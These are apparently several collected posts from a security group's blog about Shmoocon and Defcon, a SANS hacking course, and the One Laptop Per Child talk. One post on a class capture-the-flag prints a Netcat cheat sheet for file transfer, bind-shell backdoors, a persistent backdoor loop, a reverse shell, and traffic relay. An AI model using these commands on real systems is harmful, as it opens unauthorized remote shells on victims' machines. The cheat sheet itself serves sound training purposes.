Shmoocon IV was a good time for all. A few good talks, lots of good times meeting up with people, and for Alice, Mike, Sean, and Tim it was good old fashioned hacker fun as all of them played in Shmoocon's annual "Hack or Halo" competition. Now Mike was last years champion, and tied for first, but it was Tim who came in with the fastest time, and was this year's Hack or Halo winner.
Sorry for the complete lack of updates from me since Defcon. I've had plenty to write up, share, and rant about (as is my want), but I'm in somewhat of a tenuious circumstance regarding my blogging, so I figure better safe than sorry, and thus I'm keeping my comments to a minimum. Hopefully some of the other Minds will pick up the slack. We shall see.
So my SANS course this past week culminated today with a nice game of capture the flag. While not Defcon caliber it ended up being quite a lot of fun, especially for a game that only could last six hours, and did a fantastic job of bringing the course together. We learned a lot of tools during the class and playing scenario based ctf brought it all together as many of them were used during the game. Mostly we focused the old favorites: NMap, Nessus, John the Ripper; the kinda tools that have been around forever, and for good reason.
We focused mainly on another tool, one I'd known but used little. Called the "network swiss-army knife" Netcat proved, as we were promised by Ed, the most useful tool of the whole course. Netcat does just about everything. Yes, I know, if you've been in networking or security for any amount of time you're asking how I'd missed that, I hadn't, but practical use is something else. There's no doubt it's one of the most useful tools a network admin, security engineer, or hacker could ever want. So just for general consumption, and for myself, I'm posting the cheat sheet I used during our class CTF competition (my team came in 3rd of around 50 in case you were wondering) just to get any other Netcat neophytes started and possible remind some old hands of some fun tricks:
Data Transfer (Pull):
server: nc -l -p [port] < [filename]
client: nc [server ip] [server port] > [filename]
Data Transfer (Push):
server: nc -l -p [port] > [filename]
client: nc [server ip] [server port] < [filename]
Backdoors:
unix: nc -l -p [port] -e /bin/sh
windows: nc -l -p [port] -e cmd.exe
Persistant Backdoor:
while [ 1 ]; nc -l -p [port] -e /bin/sh; done
Reverse Shell
server (attacker): nc -l -p [port]
client (victim): nc [server ip] [server port] -e [shell]
Backdoor Client:
nc [server ip] [port]
Traffic Relay on Linux:
mknod backpipe p
nc -l -p [incoming port] 0
Traffic Replay:
nc [targetip] [port] < [filename]
A special thanks to David "The Canadian Invasion" and Josh (it's a d, not an 8); great team fellas, it was a pleasure.
I've spent the past few days taking the SANS 504 course: Hacking Techniques, Exploits, and Incident Handling. I was lucky enough to have the course creator, Ed Skoudis, as my course instructor. I don't know if I know anyone who seems to have Ed's combination of breadth and depth in the information security field. I guess that's how you become one of the senior handlers at the SANS Internet Storm Center.
I plan on doing a write up of my class and what the Vulnerable Minds have been up to for the past few weeks. A short update:
So! The qualifying round of DefCon's infamous Capture the Flag competition is this weekend. I'm excited, and not just because this would be my first CtF experience. The synergy (more or less) of people coming together with different experiences, knowledge, and ways of looking at problems could prove to be a great way to delve deeper into the field of code and code manipulation. (Let's be honest here, when it comes down to it, this is less about offense or defense and more about mental technique.)
This weekend, a group of us will be sharing one apartment, eating each other's food, hacking to the point of exhaustion... I can't think of a better way to spend a random summer weekend, but that could just be me. ;)
In preparation, I've been looking over last year's quals, helpfully posted by last year's team 1@stPlace. I think one of the things that blew me away was the wide range of topics presented, and the variety of exploitable things. XSS? Bitstream analysis? Reverse engineering protocols? Stealing entangled qbits? OK, just kidding about that last one, but it goes to show what an awesome, diverse field infosec can be. And as much as this is about hacking and having fun, I can only wonder what future DefCon CTFs may hold, especially with the dominance of mobile computing...
But the future can wait. This weekend, let teh funz beg!n.
The Dark Tangent posted to the Daily Dave list yesterday that the Call for Papers for Defcon is officially open. Any security pros, hackers, lock pickers, or general trouble makers have until June 15 to submit their ideas for sessions that will be seen by throngs of script kiddies, feds, and the aforementioned trouble makers at Defcon 15 this year from August 3rd through 5th.
Now you may have noticed that Vulnerable Minds made a decent splash this year at Shmoocon. Mike was on top of the hacking side of Hack Or Halo by an impressive margin. Mike, Steve D, and Tim also got more than a little press for their release and subsequent recall of Billy Hoffman's Jikto code. Myself and new Mind Corey were both involved with the inaugural Shmoocon Labs. A few people might have also heard of the little talk done by Sean and I towards the end of the con. Regardless Vulnerable Minds had quite the presence and I was proud to be a small part.
With DefCon gearing up we're weighing our options. I know I'm considering working on something to submit for a talk, and a few of the Minds might join me. We're also considering a little of Kenshoto's brand of CTF. Or who knows, maybe it'll be good old fashioned talks, hacking, and causing trouble in Las Vegas. Either way it should be a good time and Vulnerable Minds plans to be in the middle of it.
I know I really need to write up my Shmoocon follow up. It's first on the list for today after I get coffee. Until then I offer you this reference to two of my favorite things: security and hip-hop:
From XKDC.
In case it hasn’t been evident in our last few posts, a group of us here at VulnerableMinds took a trip down to ShmooCon this past weekend. Personally, this was my first taste of the ‘Con and I must say I was quite impressed. For those of you who still may not be familiar with it, I encourage you to swing by the ShmooCon website.
The main strength of the ‘Con is by far the speakers. There were quite a few novel and impressive ideas shared during these speeches. I am anxiously awaiting the video form of the presentations to be posted at shmoocon.org. Since there were three speakers presenting different materials during each of the time slots, it’s safe to say that I may have missed a few.
I would be remiss in this post if I didn’t highlight the efforts of two of our own - Scott Roberts and Sean Coyne. Scott and Sean, along with Ivan Krstic and Jason Scott, presented on the popular One Laptop Per Child (OLPC) project. The presentation was thoroughly enjoyable and quite thought provoking (of course, I may be slightly biased). Some highlights of the presentation were covered by InfoWorld. Hats off to Scott and Sean for a job well done.
P.S. I bow to the awesomeness of Hack-or-Halo.
At the One Laptop Per Child panel today at Shmoocon '07, Ivan Krstic announced that the previously known specs have been updated. The XO had a 366Mhz AMD processor with little cache, 128MB RAM, and 512 NAND flash acting as storage. As of today, the machines will now be running the AMD Geode LX-700 at 433Mhz. It is a .13 micron chip which runs at 0.8 watts making for some nice battery life when combined with the new experimental LiFePO(4) cells. The RAM and storage have been increased to 256MB and 1024MB respectively. The 7.5" sunlight capable screen has a resolution of 1200x900 mono and 692x520 color at 200 DPI. It uses the draft 802.11s ESS mesh networking and also supports 802.11b/g. Of course, it still has the three USB ports, stereo speakers, 30FPS VGA webcam, SD card slot, and microphone.
Read more about the One Laptop Per Child project here
Read more about the ShmooCon presentation here
This code was demoed at Shmoocon '07 during the Javascript Malware for a Grey Goo Tomorrow presentation. The code was given to us by our newest mind Mike, and first analyzed by Steve Davis. It allows for client side internal vulnerability scanning through Javascript. It is currently missing a frontend to run it. First one with a front end wins :)
UPDATE 3/25: Source code removed at request of Jikto creator
That's Information Security Insomniacs, clever I know.
Well it's late and I've been doing Shmoocon prep work all day. I didn't want to call it a night before I posted something interesting.
While no one would confuse me for a big Microsoft fan there are some things I think they've managed to do very well. Necessity being the mother of invention Microsoft has now developed one of, if not the most, expansive computer security programs in the world. I can't speak for anyone else, but I'm always curious what goes on behind closed doors like that, and in this video documentary of the his team Stephen Toulouse really gives you a run of the farm at Microsoft Security Response. Definitely worth a watch.
Well, it's official now. From Shmoocon.org:
I'm not gonna lie, Sean and I are stoaked. This is really shaping up to be a great talk. Jason Scott has done some really great talks before from Shmoocon, Defcon, and others. Not to mention any guy making a profession of love to Bruce Potter can't be bad at all, just amusingly crazy. He's teaming up with Sean to take a look at the sociological, economical, other -ical type things that will come up with the OLPC.A Plenary Session on the Security and Social Impact of the One Laptop Per Child program
The Children's Machine, also known as the XO-1 and previously as the $100 Laptop, is a low-cost, power-efficient and durable machine developed by faculty members of the MIT Media Lab at the One Laptop per Child non-profit organization (OLPC). The laptop's purpose is to redefine learning for children in developing countries, particularly those living in the most remote areas and in the poorest of countries, by providing them with access to knowledge and modern forms of education. The laptops contain flash memory instead of hard drives and use a custom operating system based on Fedora Core Linux, which includes a new security architecture called Bitfrost. They are built to utilize wireless mesh networking, a form of mobile ad-hoc networking, to allow machines to communicate without requiring configuration by the user. The laptops will be sold to governments and issued to children by schools on the basis of one laptop per child.
What may be the consequences of such a massive distribution of computers to children in developing nations? A much larger Internet population in a few short years appears to be a certainty. Will tens or hundreds of millions of computers running Linux drastically alter the computer security landscape? What is the potential for the laptops to be abused by criminals or closed and oppressive governments? And how will the Internet affect millions of children who find themselves with access to a world decades ahead of their own culture?
Bio: Sean Coyne
Beginning his career as the only Business School member of Penn State's NSA Center for Information Assurance Excellence, Sean is now is a sought after consultant at Booz Allen Hamilton specializing in Information Security for government clients. Sean's technical know-how coupled with a big picture view has led him to help found the Vulnerable Minds think tank, studying the impact of information security on society.
Bio: Ivan Krstic
LiveJournal doesn't have an angry mood anymore, as Ivan Krstić used it all up. Ivan has been angry on all seven continents.
Bio: Jason Scott
Jason Scott runs TEXTFILES.COM, an online collection of the last 30 years of Bulletin Board System-era history, files and artifacts. He is also the director of "BBS: The Documentary" (www.bbsdocumentary.com), a 3-DVD, 8-episode documentary about the BBS, a project 4 years in the making. He has begun production on GET LAMP (www.getlamp.com), a documentary on text adventures. He speaks on topics of computer history and social commentary at various conferences, including Shmoocon 2006, where he presented a history of hacker conferences. Jason currently lives in Massachusetts, and is secretly in love with Bruce Potter.
Bio: Scott Roberts
An up and coming member of the DC InfoSec community. Scott began his interest in Information Security trying to get access to the Internet in 9th grade computer classes and it has lead him to a position as a Global Security Analyst at Symantec Managed Security Services. Along with Vulnerable Minds, a think tank he helped found, Scott is also involved in various projects involving Snort, large scale architectures, and teaching information assurance.
